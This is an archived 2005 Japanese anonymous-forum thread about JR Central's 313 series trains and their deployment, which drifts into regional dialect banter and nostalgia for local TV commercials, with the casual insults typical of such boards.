313-2000


7: 名無し野電車区 2005/09/09(金) 18:41:04 ID:PIQMoA9F
>>1
スレタイ変えるなバカ

8: 名無し野電車区 2005/09/09(金) 21:27:21 ID:cypGwLHF
前スレのごちゃごちゃしたタイトルよりはマシ。
気動車スレはこっちに統合?

11: 名無し野電車区 2005/09/09(金) 22:51:11 ID:WZ1RGqiz
>>8
あっちが満タンか鯖落ちになった時点で、こっちに合流と言う形で統合。

12: 名無し野電車区 2005/09/09(金) 22:56:33 ID:iwDn4E7z
それなりの良く出来た313系を応援しましょう。

13: 名無し野電車区 2005/09/09(金) 23:00:23 ID:4znnbIh+
新たに投入される313系について語るスレッドはここですか?

14: 名無し野電車区 2005/09/09(金) 23:00:32 ID:NgaSNFf1
リクライニングシートを搭載した
ワンマン運転対応のキハ75系・2連を希望。

「セントラルライナー・みえ」から「ワンマン運転のローカル列車」まで
幅広く運用できる車両として重宝されそう。

15: 名無し野電車区 2005/09/09(金) 23:03:37 ID:iwDn4E7z
313系ももう少し両数を増やしてもらいたいが、身延線や御殿場線の2両編成の
313系はかわいい感じがする。実際に乗ると混んでいて殺伐としているが(w。

16: 名無し野電車区 2005/09/09(金) 23:23:52 ID:/43rGhxl
>>15
身延線はそんなでもないですが、御殿場線では特に目立ちますね。
全線30分間隔にすれば二両でも間に合うしもっと利用されるでしょうに。
小田急から乗り換えるといきなり僻地のローカル線?
小田急沿線在住でたまに御殿場あたりに遊びに来る人が、静岡県って何にもない
糞田舎だって思っても・・・、まあ当然でしょうねw

17: 名無し野電車区 2005/09/10(土) 02:05:25 ID:1qxkosgN
松田ー国府津は特急も来ないしホントローカルなんだけど、神奈川県で
東名と平行、西湘バイパスIC、小田原厚木道路とクロスで地理的には
本数があってもよさげなんだけど。このへんの住民は小田急かバス利用
なんだよね。

23: 名無し野電車区 2005/09/10(土) 08:41:02 ID:gnFDgubX
>>17
昭和のころは国府津駅→下曽我方面の富士急バスが
22時20分まであった。静岡側にはそんな遅いバスはなかった。
せいぜい21時50分まで、御殿場は昔から21時40分。
身延線が旧国天国→ワインレッドだった時代は四両でもけっこう満員で、
富士宮、芝川、十島、内船、身延、鰍沢口と主要な駅には
富士急・山交バスがお客を待ち構えていて山奥の奥まで入っていったもんだよ。
今じゃ西富士宮すぎると二両でもガラガラ。313投入が奇跡に思える。
スレ違いよのう。

18: 名無し野電車区 2005/09/10(土) 02:16:47 ID:08GZIrKd
川音川からみる2連の313系はモデモのNゲージが走ってるカンジですよ。

19: 名無し野電車区 2005/09/10(土) 02:23:12 ID:bGQpDImN
>>18
モデモという所がシブい。
KATOは似て非なるものだしね。

20: 名無し野電車区 2005/09/10(土) 02:25:38 ID:08GZIrKd
>>19
愛知博で日車夢工房の313系チョロQを買ってしまったよ。窓側に置くと
御殿場線が走ってるみたいで(w。
愛知は鉄道チョロって盛んだね。

22: 名無し野電車区 2005/09/10(土) 04:00:55 ID:83S0AdDJ
119系は名古屋に顔を出してこそ真価を発揮すると思うよ。
119系が4連で2本並んだときなんて圧巻ですよ。
ボックスシートに座りホームをすべるように発車する119系、
ほとんどの直線で130キロ運転する119系、
想像したらなんだか乗りたくなってきたよ。

性能面では、はぼ371、373、313と互角でしょ。
さすがに313にはほんの少し乗り心地で劣るかと思うけど、
ほとんど分からないくらいのレベルだし。
そんな119系をばかにする奴なんかJR乗車禁止!明哲にでも乗ってなさい!

25: 名無し野電車区 2005/09/10(土) 09:41:44 ID:XfaFuOjh
>>22
119系で130Km/h運転って、をい!!w

24: 名無し野電車区 2005/09/10(土) 09:38:55 ID:P5h2gKwr
真冬の駒ケ根始発、1420Mに乗ると考えがかわるよ。

車内温度-6℃でキンキン冷えた車両で豊橋まで逝ってもらおうか?
乗務員ですら気を失いそうになるというのにな。

26: 名無し野電車区 2005/09/10(土) 10:46:55 ID:Sj3rQMoY
>>24で思い出したのだが、木曽谷に313が入ったはじめの冬、半自動装置は利用されなかった。
特急の通過待ち合わせの時も、名古屋地区で見られるような両側の扉だけ閉めていた。
乗客からは「寒い」「雪が舞い込む」等の苦情のあらし。それでも改善されず。
東日本管内でも使われてなかったから、投入当時は実装されていなかったのか?

28: 名無し野電車区 2005/09/10(土) 11:33:27 ID:sTjTKO5h
>>26
いや、付いてた。
投入直後に束の人間が入庫待ちの時間に切り替えて遊んでた。

31: 名無し野電車区 2005/09/10(土) 12:32:14 ID:Sj3rQMoY
>>28
じゃあ何で使わなかったんだろう?東海だけ使わないなら理解できるけど、東日本も使わなかったので・・・
装置に不備があったとか?

48: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 11:32:20 ID:3IG7XYHG
>>31
現場を知らないお偉いさんの指示。
車掌さんに聞いたら、「私も使用したいんですけど、上から使用するなと言われているもので。ご迷惑おかけしてすみません。」
と言っていた。

52: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 22:04:50 ID:mtYUTiJA
>>48
213の補助椅子も使われてないな。
成功していたら313も223と同じ座席配置だっただろうな。

27: 名無し野電車区 2005/09/10(土) 11:26:32 ID:mxx/wQMD
東海のまともな車両は700系だけ?

29: 名無し野電車区 2005/09/10(土) 11:34:02 ID:QPxUwnW5
>>1
乙!
だが、このスレタイだと300系やら700系も入ってしまわないかい?

32: 名無し野電車区 2005/09/10(土) 14:08:57 ID:4YENMw5f
>>29
なら次スレのタイトルは
JR東海の在来線車両 Part3
にする?

30: 名無し野電車区 2005/09/10(土) 12:05:27 ID:IE30TAfb
313御殿場線に乗っています。鈍行もワイドビュー!すごい

33: 名無しさん@そうだ選挙に行こう 2005/09/10(土) 21:08:06 ID:2ObbchR1
ところで211-0と311は加速の関係で新駅開業後に日中の各停に使えなくなるから名古屋追放と予想する者がいるが、実際にどの程度の加速性能があれば新駅開業後に快速から逃げられるのだろうか?
もし逃げられれば、名岐対策があるので311を静岡に持っていく必要はない(でも、313は静岡では性能持て余し気味だし、211-5000は遠近分離ができていて乗車距離が短い名古屋口各停に適していて、ラッシュ時に使える車両だしな……)。

39: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 02:40:57 ID:zI5P4U4U
>>33
313は加速や曲線通過においても他より長けている事を知ってるか?
最高速度だけで静岡に入れても性能を発揮できないと考えるのは知恵が浅過ぎ。
静岡は意外と坂やカーブが多い上に、15秒停車もあったりで、決してまったりした土地ではない。

34: 名無しさん@そうだ選挙に行こう 2005/09/10(土) 22:13:17 ID:ytktARKn
静岡地区にも快速ができます。

35: 名無しさん@そうだ選挙に行こう 2005/09/10(土) 22:24:15 ID:H/EU6qKV
きょうは静岡⇔磐田で往復とも311利用だった漏れは



負け組。・゚・(ノД`)・゚・。

37: 名無しさん@そうだ選挙に行こう 2005/09/10(土) 23:39:20 ID:JtpLFJem
>>35
じゅうぶん勝ち組だと思うが。

38: 名無しさん@そうだ選挙に行こう 2005/09/10(土) 23:59:09 ID:jBtUYP6l
>>37
ヒント:カレン・ロバート

36: 名無しさん@そうだ選挙に行こう 2005/09/10(土) 22:45:30 ID:Sj3rQMoY
中央に313はいらん。中津川快速のみでいい。

40: 東ユーザー 2005/09/11(日) 04:28:48 ID:RPDK+1sD
311系と313系のいいとこ、それぞれ教えて!

41: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 06:02:20 ID:iKD8x8Nd
311系:座席が広くて多い
313系:立席が広くて多い

42: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 06:08:28 ID:vnhOxjIG
相互に連結できる

43: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 06:12:14 ID:EZWtG99i
静岡にも快速が走るって本当ですか。

44: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 07:11:02 ID:iKD8x8Nd
>>43
隔離スレから出てくるな気違い

45: 名無し野電車区 2005/09/11(日) 07:28:32 ID:a5hNCn9n
>>43
まぁあそこは通し客ばっかりだから、実際あってもいいよな。

米原-大垣間も同じ考えだ。まぁ後者はそんなことしたら
確定普通は昼間は必ず空気輸送になるだろうな。

しかし
混んでてもすぐにいけるのがいい人
時間かかってもまったり行きたい人
の住み分けはできるわな。
確定は毎回2両でいいし。大して難しいことではないだろう。

でもそんなことより、大垣切り離しの方が問題きゃな。
まぁ大垣-米原は普通快速の2本だてにしても、採算取れるかどうかな・・・

46: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 08:06:42 ID:juPJFx9P
>>45
18の有効期間は終わったぜ坊や

199: 名無し野電車区 2005/09/18(日) 23:57:54 ID:/eSo/xHw
ところが>>45がこんなこと言ってるわけで…

43 名無しさん@そうだ選挙に行こう 2005/09/11(日) 06:12:14 ID:EZWtG99i
静岡にも快速が走るって本当ですか。

45 名無し野電車区 2005/09/11(日) 07:28:32 ID:a5hNCn9n
その後>>45は18ヲタではないかと指摘されて逆上しているわけだが。

199: 名無し野電車区 2005/09/18(日) 23:57:54 ID:/eSo/xHw
>>43
まぁあそこは通し客ばっかりだから、実際あってもいいよな。


47: 名無し野電車区 2005/09/11(日) 11:25:50 ID:a5hNCn9n
平日に乗っても 昼間はすいてるが
それ以外は通し客ばっかじゃないか 坊や

49: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 11:54:30 ID:juPJFx9P
>>47
オウム返ししか脳の無い18ヲタ乙

50: 名無し野電車区 2005/09/11(日) 13:16:44 ID:a5hNCn9n
>>49
まぁ勝手に言ってなさい。相手するのが(ry
ほんとに疲れるわww

残念ながら今年は18使ってないんだわ
2,3年前からあまり使わなくなったなぁ

今年は、JR酉の酉日本パスは使ったけどな。もちグリーン用。
あれはよかったぁ~

51: 名無しさん@そうだ選挙に行こう 2005/09/11(日) 14:34:31 ID:4nGwA6xg
本当に通し客ばかりだったら、ケチな火災大明塵なら
普通の快速格上げで電力消費量の節約と運用数の削減を画策するはず。
しかし未だ実行されないのはなぜか。

54: 名無し野電車区 2005/09/12(月) 22:21:19 ID:pFC1Fo7h
>>51
通し客は新幹線へ
地元客はダラでOKということだろう。

55: 名無し野電車区 2005/09/13(火) 11:05:17 ID:llKS7Fup
>>51
では快速にしまひょ
となると、普通は間違いなく減るよね??

そうなると地元自治体も文句言うだろうし、
かと言って普通を今の通りの本数にしようとすると
快速の本数だけ総数がプラスされる

となると、車両も運転士もその分必要に
となると、経費も余分にかかる事になる

文句言われるのもいやだし、
経費が余分にかかるならもともこもないし
名古屋やら岐阜と比べたら
旅客通過量なんて知れてるから ほかっとこ~

ってなことじゃないの?

56: 名無し野電車区 2005/09/13(火) 18:24:06 ID:dh82J13W
>>55
>ほかっとこ~
なんだ?暖かい床屋?意味不明。
標準語で書いてくれよ。

57: 名無し野電車区 2005/09/13(火) 18:35:11 ID:dYniKUtA
そのままにしておけ
ほかっておけ ってこと

59: 名無し野電車区 2005/09/13(火) 21:06:06 ID:6FYB+vWt
>>57
どこの言葉?初めて聞いた。
静岡で言う
ほうっておけ、とかうっちゃっとけ、ってのと同義のようだな。

58: 名無し野電車区 2005/09/13(火) 19:02:47 ID:AS2lP4u6
名古屋:東京へは速くて便利な新幹線を(ry
静岡圏:中長距離のご利用には新幹線を(ry
醒ヶ井:引き続き米原駅からは新幹線を(ry

まぁこういうことだ罠。

60: 名無し野電車区 2005/09/13(火) 21:09:45 ID:yi+kbfl9
ちらしずしておけ

61: 名無し野電車区 2005/09/13(火) 21:18:54 ID:dYniKUtA
さぁ ただ「○○しておこう」と
ほかっとけ

がくっついて ほかっとこ~ となったのでは?

ほかっとけ は 方言かな?
愛知では普通に通じるとは思うのだが
って方言じゃないよね

63: 名無し野電車区 2005/09/13(火) 21:38:36 ID:6FYB+vWt
>>61
すくなくとも静岡中部以東では聞いたことがない。

62: 名無し野電車区 2005/09/13(火) 21:21:15 ID:dYniKUtA
ほかっておこう → ほかっとこ~ ってことね

65: 名無し野電車区 2005/09/13(火) 21:42:47 ID:6FYB+vWt
>>62
ほかっておこう自体が初耳。
方言スレみたいになってきたな。お国ことばは悪いわけではないが、
名古屋口限定スレではないので(少なくとも東海エリア周辺の連中は読む)
そこんとこよろしく。

64: 名無し野電車区 2005/09/13(火) 21:42:36 ID:2KMiEaYP
御殿場線スレなんか見てると快速は望んでるようだけど。
もしくは静岡直通特急「ごてんば」でもあればいいらしい。
まあその話が出るたびに御殿場の人間は静岡より東京指向だとかいって収拾がつかなくなってる。
御殿場線~沼津~静岡鈍行ってのはそれなりに距離があるからね。

66: 名無し野電車区 2005/09/13(火) 21:43:12 ID:yi+kbfl9
東海の車輌スレでどうしてここまで「この地方」の方言が叩かれにゃならんのだ。

67: 名無し野電車区 2005/09/13(火) 21:46:56 ID:6FYB+vWt
>>66
「この地方」ってのはどこを指すのか?濃尾平野のこと?
東海の営業範囲には東は神奈川や山梨、西は三重、滋賀まで含まれる。
そのお山の大将的なスタンスが叩かれるんじゃないかと思われ。

70: 名無し野電車区 2005/09/13(火) 21:53:05 ID:temyu5Ux
>>67
つうか、たまたま静岡人のカキコが多かったからだろ。
悪いけど、そりゃ在来線だと人口比でいけば濃尾平野在住が過半数なんだからお山の大将にはなるさ。

71: 名無し野電車区 2005/09/13(火) 21:54:42 ID:6FYB+vWt
>>70
はいはい、良かったですね。

72: 名無し野電車区 2005/09/13(火) 21:57:10 ID:yi+kbfl9
>>67
方言を使う=お山の大将という思考回路が分からん。
むしろ静岡ももっと積極的に方言を使えばよい。

75: 名無し野電車区 2005/09/13(火) 22:05:49 ID:6FYB+vWt
>>72
んじゃ遠慮なく。

やー、いうもんだでほーげんでかかしてもらわーえー。
ふんとにやっきりこいちまうだよ。愛知の衆っちがちょびちょび粘着するもんで
おらもはーやんなっちまって、ぶっくらわしてやらすかとおもーだよー。
おまんちにもはっきり言えるこたー、おぜー113ははーいらねーだけーが、まーえーらー。

静岡県志太榛原弁で失礼致しました。

80: 名無し野電車区 2005/09/13(火) 22:32:00 ID:temyu5Ux
>>75は自分のこと言ってるんじゃないの?

81: 名無し野電車区 2005/09/13(火) 22:34:15 ID:6FYB+vWt
>>75を解読できたとすればたいしたもんだ。

82: 名無し野電車区 2005/09/13(火) 22:36:59 ID:temyu5Ux
>>81
完全には理解できていないがね。
一応三河出身だから、ある程度は分かるさ。

86: 名無し野電車区 2005/09/13(火) 22:45:05 ID:6FYB+vWt
>>82
三河だと近いものがあるかもね。俺は育ちが駿河でも遠江寄りなので。

86: 名無し野電車区 2005/09/13(火) 22:45:05 ID:6FYB+vWt
今いる富士地区は>>75とはまたかなり違うよ。

68: 名無し野電車区 2005/09/13(火) 21:48:57 ID:kivU8DTv
311の加速性能を313並にアップさせることは出来ないの?
静岡に311なんてもったいない!?よ・・・
名鉄対抗車として、名古屋地区で使ったほうがいいよ

静岡には117でいいよ
熱海にも、とぼけて!?普通列車で乗り入れちゃえ・・笑

69: 名無し野電車区 2005/09/13(火) 21:51:57 ID:6FYB+vWt
>>68
身延線用の115-2600より古い117を今更転属させても
意味なしおちゃんだな。

73: 名無し野電車区 2005/09/13(火) 22:00:54 ID:NDsWiv7v
このスレの流れは名古屋系と静岡系が相互不干渉で来てたんだから黙ってりゃ良いのに。
御殿場線や身延線の無人駅の話題振っても文句つけたことないんだし。

74: 名無し野電車区 2005/09/13(火) 22:01:50 ID:yi+kbfl9
まあもっとも匿名掲示板だから方言はなし、って考え方もあるけどな。

77: 名無し野電車区 2005/09/13(火) 22:20:23 ID:HGATWmKV
粘着車輪

78: 名無し野電車区 2005/09/13(火) 22:24:10 ID:temyu5Ux
ま、ひとつ言葉を覚えて勉強になっただろw

79: 名無し野電車区 2005/09/13(火) 22:30:29 ID:6FYB+vWt
>>78
サプライズの多いスレですねww。

80: 名無し野電車区 2005/09/13(火) 22:32:00 ID:temyu5Ux
>>79
キミもかなり粘着だね。

83: 名無し野電車区 2005/09/13(火) 22:37:23 ID:yi+kbfl9
さあさあお国自慢スレと化してまいりましたw

84: 名無し野電車区 2005/09/13(火) 22:40:24 ID:6FYB+vWt
ぶっちゃけ今夜は東海道線で隣におデブちゃんが座って暑苦しかった、
帰って来てTVK見てたらベイズターズがドラゴンズにあっさり負けるし、
なかなか気温が下がらない。暇つぶしに釣りをしてみた。

付き合ってくれたみなさんどもありがと。

85: 名無し野電車区 2005/09/13(火) 22:43:54 ID:HGATWmKV
いまさら釣り宣言はイクナイ

87: 名無し野電車区 2005/09/13(火) 22:46:28 ID:GBu4ubPU
これみよがしに「TVK」ですか…

小文字で書け。詰めが甘いぞw

88: 名無し野電車区 2005/09/13(火) 22:51:52 ID:temyu5Ux
>>87
そもそも製作はMTVなのだがw

89: 名無し野電車区 2005/09/13(火) 23:06:31 ID:6FYB+vWt
>>88
三重テレビ製作か。三重といえば古木の故郷、古木は豊田大谷だったね。
続きは野球板で・・・。

89: 名無し野電車区 2005/09/13(火) 23:06:31 ID:6FYB+vWt
>>87
tvkは由比以東の再送信で視聴可。
これみよがしとかで無く沼津や伊豆のCMがやたら多い。

90: 名無し野電車区 2005/09/13(火) 23:25:38 ID:dYniKUtA
三重テレビはCMのセンスが悪すぎる

93: 名無し野電車区 2005/09/14(水) 10:24:13 ID:1AinUCX9
残念>>90は愛知県民です。名古屋近辺です。
三重テレビのCMは 馬鹿みたいに古いのやってるわ
なんか一味違うわ 本当にセンスが悪い
一度見らだれでもわかると思う

あのトヨタでさえ最後に三重の店舗が余分なものを吹き込みやって
腐ったものになっている
三重建設図書館か?なんかのCMはまぁそこそこまとまってるが
使われてる音楽がいまいち
やはり田舎は考え方や感じ方まで遅れているのか・・・

何気なくつけてて CMになると
「ん?なんだ俺は三重テレビ見てたのか」とすぐにわかる
三重の地名が出る前に

96: 名無し野電車区 2005/09/14(水) 17:41:05 ID:nzEos32I
>>93
榊原温泉のCMはオススメ。気分だけでもタイムスリップできるよ

108: 名無し野電車区 2005/09/14(水) 21:43:25 ID:zh8K5g/R
>>96総理大臣受賞、錦鯉で有名な・・・・

97: 名無し野電車区 2005/09/14(水) 17:50:59 ID:GVEifolP
>>93
> 何気なくつけてて CMになると
> 「ん?なんだ俺は三重テレビ見てたのか」とすぐにわかる
> 三重の地名が出る前に
うっわ、お前は俺かwww

103: 名無し野電車区 2005/09/14(水) 20:19:08 ID:avGNJbg3
>>93
失礼な。
俺は毎朝三重テレビのブルームバーグニュースで目覚める。
そして毎夜、三重テレビのTVショッピングを見ながら眠りに就く。
セサミンの効用なんかイヤというほど聞かされたしな。

104: 名無し野電車区 2005/09/14(水) 21:26:02 ID:tX7xWdvV
>>93
三重建設図書館のCM自体謎だけんど・・・

110: 103 2005/09/14(水) 21:51:28 ID:6M2zcol8
>>93 ワラタ
最近は、値切りのババアがでるのをよく見ます

131: 名無し野電車区 2005/09/15(木) 10:59:12 ID:c3NiydaM
>>110
あのばばぁうザ杉
氏んで欲しい

三重テレビはコンサートのCMよくやってるな
おそらくやるCMがないんだろうなww
あと未だに動かないCMをほんの時々だがやってる罠

112: 名無し野電車区 2005/09/14(水) 22:14:19 ID:avGNJbg3
>>93
続き。
三重テレビは名古屋局よりエリア人口も少ないし、独立U局だからネットワーク局のようにメジャーなCMはそう期待できんわな。
期待もしてないって話もあるが。
新旧の三重テレビCMだと、やっぱ古いのでは榊原温泉紫峰閣かな。
あと最近は見れないけど亀八食堂か。
新しいところでは松阪のキャバクラ「ダイヤモンド・ヴィレッジ」が笑える。

131: 名無し野電車区 2005/09/15(木) 10:59:12 ID:c3NiydaM
>>93
セサミンw まぁごちゃごちゃ言ってる俺も寝る前は
ふとTVショッピングをみてしまう 
ShopJAPAN やら色々なところがやってるね

しかし三重テレビはいつ見てもニュースは不細工と
醜いおじちゃんしか目に付かない
すぐにチャンネル変えたくなる まぁ昼も夜もTVshopping が命だなww

91: 名無し野電車区 2005/09/14(水) 03:16:35 ID:i/XFztb3
・・・だから静岡人は(r

92: 名無し野電車区 2005/09/14(水) 07:16:58 ID:cGUwPQMd
浜松沿岸部で三重テレビが受信できないこともない。

94: 名無し野電車区 2005/09/14(水) 12:11:00 ID:cGUwPQMd
魅惑の三重テレビ

95: 名無し野電車区 2005/09/14(水) 12:15:39 ID:5i+8K/sB
安心汁!
「テレビさいたま」があるじゃないか!
「レッツゴーゲートボール」等々魅惑の番組盛り沢山☆

106: 名無し野電車区 2005/09/14(水) 21:34:53 ID:lUCzrW0V
>>95
うまい、うますぎる!一時西武新宿線で通っていました。

98: 名無し野電車区 2005/09/14(水) 18:28:10 ID:cGUwPQMd
秘宝館のCMやってます?

99: 名無し野電車区 2005/09/14(水) 18:34:04 ID:72kVfAO4
静岡でやってる漢方薬の荷居屋のCMも古い。

106: 名無し野電車区 2005/09/14(水) 21:34:53 ID:lUCzrW0V
>>99
あれまだやってるの?
静岡も古いのや動かないCMはほとんどなくなったな。
結婚式場は昔は平安閣だのブケ東海だの腐るほどやってたが
めっきり見なくなったね。みんなハワイの教会とかレストランで式あげちゃう。
新郎新婦の親戚来賓がズラリ並ぶ結婚式など久しく出てないなあ。
とりあえず車両ネタがないのでこんな話題ばかり。

101: 名無し野電車区 2005/09/14(水) 18:39:57 ID:tKC8WACB
愛知県は結婚式場のCMがやたらと多いね。東京じゃ見たことない

102: 名無し野電車区 2005/09/14(水) 20:12:24 ID:sX4DlMfA
>>101
名古屋は嫁入りにスゲー金掛けるって言うからCM打っとけば
その分儲かるんじゃない?

105: 名無し野電車区 2005/09/14(水) 21:28:08 ID:zbdS1/OW
>>101
オーハピーデー
タカラホーテールー

と超古いCMの話題を振ってみるテスツ

107: 名無し野電車区 2005/09/14(水) 21:43:17 ID:zbdS1/OW
学生服はやまだじゃやだ~

109: 名無し野電車区 2005/09/14(水) 21:50:51 ID:lUCzrW0V
>>107
おいしいお菓子はな~かまん。中満中満な~かまんまん。
知ってたら20代後半以上。やる気まんまん。

111: 名無し野電車区 2005/09/14(水) 21:51:48 ID:zbdS1/OW
>>109
ナカーマン( ・∀・)人(・∀・ )

ではない、もう30代だよ_| ̄|○

113: 名無し野電車区 2005/09/14(水) 22:15:59 ID:lUCzrW0V
>>111
それじゃ
履物は仁藤!とかロリエ~、セシボン?とかもせーいーぶー♪も
まつびし~♪も鈴勝~焼肉のた~れ~とか、王貞治です。うちは娘が三人。
も知ってる世代か!
あの頃は良かったね。ピンクレディといかりや長介と伊東四朗が静岡の誇りだった。
SBSなんかもケッタウェイズとかくんちゃんとか
無茶苦茶な人気だったし。テレビ静岡が伊集院光にごてんばあさん作らせたりね。
静岡の街も今よりもっと中央直結で活気がみなぎってたよ。
80系がそろそろ終焉、身延御殿場では旧国がガンガン走ってた時代だもんな。
ああ昭和は遠くなりにけり。

114: 名無し野電車区 2005/09/14(水) 22:42:55 ID:6Hps27vK
とりあえず俺の予想。

第1弾 来年の春までの動き→予備車の廃車
万博応援用で静岡→神領に貸し出しの113系6連×2本、4連×2本、さらに神領の113系6連×2本、静岡の113系4連×1本、バラ3両の計39両廃車。

第2弾 313系との入れ替え
残りの113系・115系・123系の234両を廃車。
313系6連×10本は大垣へ配置。
313系6連×2本、4連×2本は神領へ配置。
313系3連×34本、2連×11本は静岡へ配置。

大垣→静岡へ311系4連×15本転属。

運用予想
大垣の313系6連は、大垣~浜松の新快速と、大垣~豊橋の快速に運用。(検査時は4連+2連)
大垣~豊橋の新快速は4連+2連にし、2連は一部飯田線新城まで乗り入れ&昼間、飯田線での運用。

神領の313系増備分は、現行の朝夕の113系運用に入るほか、昼間飯田線豊橋口での運用。

静岡の313系は基本的に3連は東海道線、2連は御殿場線・身延線で運用。(3連が御殿場線や身延線に入ることも当然ある)
また大垣から転属の311系4連は東海道線で運用。

飯田線は、豊橋口の運用の一部を119系から313系にし、119系を飯田方面の運用に就かせ、115系3連×2本の運用を埋める。
現行の静シス車115系の長野までの運用を廃止。距離相殺で、長野からの115系の飯田線への乗り入れも廃止。

こんな感じかと。

125: 名無し野電車区 2005/09/15(木) 07:16:29 ID:07doKjTN
>>114
だからシスに311は来ないって何度言ったら(ry
シスには211-5000が大挙に転属してくるのでお楽しみに。

129: 名無し野電車区 2005/09/15(木) 10:10:54 ID:yQh5fBuz
>>125
神領が211を手放すとしたら313のロングが入る場合のみ。
こういうカキコを見るたびに思う。
静岡人ってホント「通勤電車」ってものを知らないんだなと。
ロングを入れるほどの輸送密度じゃないだろうが。
※キモ瀬くんの書き込み

136: 125 2005/09/15(木) 19:46:25 ID:07doKjTN
>>129
捻出元が神領だなんてどこにも書いていないのだが。
211-5000が大挙に転属してくるからって勝手に神領と決めつけないでくれないかい?
伏せておいたけど捻出元は大垣ね。
311を全て静岡に放出する場合、6連の投入本数の関係で313の4連で全て311の置き換えることはできないので、一部は静岡や神領と共通のセミクロス3連で置き換えることになる。
そうすると、名古屋口普通は転クロが減ってロングとセミクロスが多くなり、しかも一部は減車されるのでサービスレベルが落ちる。
一見短距離乗車しかないように見える名古屋口普通は名岐間を通過待ちなし24分で結び、半数を311にすることで名鉄急行に対する優位性を保っているが、ロング・セミクロス増加と一部減車によるサービスダウンでそれが保てなくなる可能性がある。
このため、311は名鉄対策用として大垣に残し、静岡の113の4連の置き換えは大垣からの211-5000の3連となる。
静岡地区は中央線や東海道名古屋口とは違って転クロでもロングでもOKだからね。

130: 名無し野電車区 2005/09/15(木) 10:30:40 ID:IVg0/mfG
>>125をどう読むと静岡人のカキコに見えるのやら…('A`)

142: 114 2005/09/15(木) 21:02:17 ID:aSORV6hs
>>125
廃車となるであろう113系・115系・123系が所属している静岡の現在の運用から考えれば、311系の転属の可能性が高いと思うが。

113系6連 5本中、2本は神領へ貸し出し。現在3本中3本使用。
113系4連 21本中、2本は神領へ貸し出し。現在19本中16本使用、1本豊橋駐在、2本予備。
113系3連 16本中14本使用、2本予備。
115系3連 21本中19本(御殿場・身延線9本、東海道線8本、飯田線2本)使用、2本予備。
123系1連 7本中6本使用、1本予備。ただし、1連×4本と(1+1)連×1本の使用なので、実質5本使用。

これで単純に使用本数を足していくと、3+16+14+19+5=57本。
313系の増備は3連が34本、2連が11本。あと12本になり、6連の増備本数と同じになるが、静岡での6連使用は朝夕のみでよく、昼間はいらない。

そこで、現在の113系6連×3本を、3連×6本として考えると、60本必要になり、足りない15本を考えると大垣の311系4連か313系4連が妥当。
313系4連は名古屋地区の快速運用に残すべきなので、311系が大垣から静岡へ転属では・・・と考える。

たしかに313系×4連で、すべての311系を置き換えることはできないが、現在の大垣~米原間の昼間の列車を313系2連から117系4連に置き換えて、313系×(2連+2連)を名古屋口で使えば、311系の置き換えは可能だと思う。


126: 名無し野電車区 2005/09/15(木) 07:26:03 ID:oGMJA4tk
>>114
バラ3両はあえて残してる(廃車予定ならとっくに西浜松送りにしてる)はずだから
それはなさそう。
たぶん、6連2本が静岡に復帰して、かわりに留守を預かっていたLL6,LL7が編成を解かれ
バラクハ3両とL25のクハ1両を元通り付けて4連に復帰するだろう。
んでL21,L24,L25あたりが廃車。

以前噂されていた、万博用4連2本は静岡に帰らず四国に売却というのは本当かどうか知らんが

115: 名無し野電車区 2005/09/14(水) 22:44:26 ID:hPZOHk6v
JR東海車両のいいところ
LEDにしないで、幕式にこだわってるところ。

116: 114 2005/09/14(水) 22:44:54 ID:6Hps27vK
一部訂正。
>神領の313系増備分は、現行の朝夕の113系運用に入るほか、昼間飯田線豊橋口での運用。

神領の313系増備分は、現行の朝夕の113系運用に入るほか、昼間中央線名古屋口での運用。

117: 名無し野電車区 2005/09/14(水) 22:56:26 ID:aN1Kva1i
一瞬広告・CM板を見てるのかと思った

118: 名無し野電車区 2005/09/14(水) 23:36:14 ID:fk4m2Ejy
20年程前 浜松に在住していたとき三重テレビがノイズ混じりで映った
昼間見ると休日は競馬中継をやってたけど平日はいつもテストパターンで放送はお休み
みたいだった

今でもそう?

119: 名無し野電車区 2005/09/14(水) 23:41:03 ID:zbdS1/OW
>>118
今は終日放送でし。
一昔前と違って独立局もだんだん力を蓄えてきているよ。

120: 名無し野電車区 2005/09/15(木) 01:14:29 ID:gENElI6R
ヲタが自己中心的願望てんこもりの313配置妄想書き込むのを止めれば、
あとは、リークだけ。いち早く真実の情報を知れるのにな・・。

121: 名無し野電車区 2005/09/15(木) 01:15:22 ID:K4E1VG5z
>>120
dat落ち狙い乙。

122: 名無し野電車区 2005/09/15(木) 01:41:49 ID:EL831aKy
まもなくR8編成降臨あげ。

10月より115系B編成定期運用に投入。

来年春より313-XX00、飯田線北部で松島運輸区を中心に長期テストラン開始。
31Xの為にデータ取りか?

123: 名無し野電車区 2005/09/15(木) 01:49:55 ID:/UgH8LfS
今日新快速を久々に豊橋から乗ったんだが、あんなに速度感薄くて
まったりした走りだったっけ?>>313系。
まえ乗った時はもっとすいすいと走ってる感じだったのだが。
最近TXとか常磐特快とか湘新ラインとか、もっと爆走感あふれた
必死な走りばかりだったのだか。もしかして速度落としてる?

124: 名無し野電車区 2005/09/15(木) 06:10:39 ID:oWKjXgvM
>>123
気のせい。

127: 名無し野電車区 2005/09/15(木) 08:10:28 ID:FpiOQih6
静岡新聞朝刊に神投稿キタ~!

128: 名無し野電車区 2005/09/15(木) 09:59:50 ID:elCWfHFl
詳しく。

132: 名無し野電車区 2005/09/15(木) 11:26:58 ID:IVg0/mfG
セサミソに出てくるラブビー選手ハァハァ(;´Д`)

135: 名無し野電車区 2005/09/15(木) 19:41:59 ID:wHbjkHLS
>>132
自社の社員だけどなw

やっぱり三浦雄一郎でしょう。
あと、あまり流れないけど、松木安太郎も出てるな。

133: 110@三重県民 2005/09/15(木) 13:01:55 ID:LhmBHMwx
最近はプリンセスてんこうのショーですね。
うちのところはケーブルテレビですが、それも結構テレビショッピングを
やっているのでテレビ番組の2つはテレビショッピングやっています。
三重建設図書館はナレーションなし。


今日は暇なので松阪へキハ48やキハ11のりに行くこうとおもいます。

134: 名無し野電車区 2005/09/15(木) 13:28:23 ID:WYGM9pWz
CMセンスの悪さといえばGBSw

137: 名無し野電車区 2005/09/15(木) 19:56:43 ID:HDqIhhei
死撫鉄乙。

